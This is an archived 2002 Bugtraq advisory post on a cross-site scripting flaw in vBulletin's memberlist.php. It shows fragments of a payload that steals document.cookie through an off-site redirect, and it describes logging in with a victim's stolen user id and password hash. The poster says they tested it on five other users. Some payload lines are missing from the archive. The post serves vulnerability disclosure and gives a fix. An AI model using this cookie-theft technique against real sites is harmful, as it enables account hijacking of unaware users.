Home page logo

bugtraq logo Bugtraq mailing list archives

memberlist.php of vBulletin
From: <plato () swgmotu com>
Date: Thu, 21 Mar 2002 19:26:36 -0500

vBulletin ALL versions
Vendor status: notified 3/18/2;  no response
Within the first few lines of code in memberlist.php, the variable
$letterbits is evaled.  Because of the way PHP initializes variables, we can
inject HTML, or JavaScript into the document.  So by directing a user to,
for example:
2Bescape%28document%2Ecookie%29%3C%2Fscript%3E(vbulletin.com has apparently
patched their installation somehow), I can steal the users password hash and
user id.  Because of the way vB parses urls, the above will not function
inside the forum, but if we put this in an off-site html file:
location =
and then link to it instead, the exploit will work as intended...the user
doesn't even have to be aware of what has transpired...the above link will
proceed first to the memberlist w/cookie stealing code, and then to my
<shameless plug>Star Wars Galaxies Player Association's homepage.
http://www.swgmotu.com <http://www.swgmotu.com/>  </shameless plug>
With the recorded user id and password hash, we can access the site:
id]&bbpassword=[password hash]
I have tried this successfully on five other users besides myself(all with
I believe the simplest fix would be to initialized letterbits($letterbits =
"";) at the top of memberlist.php.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]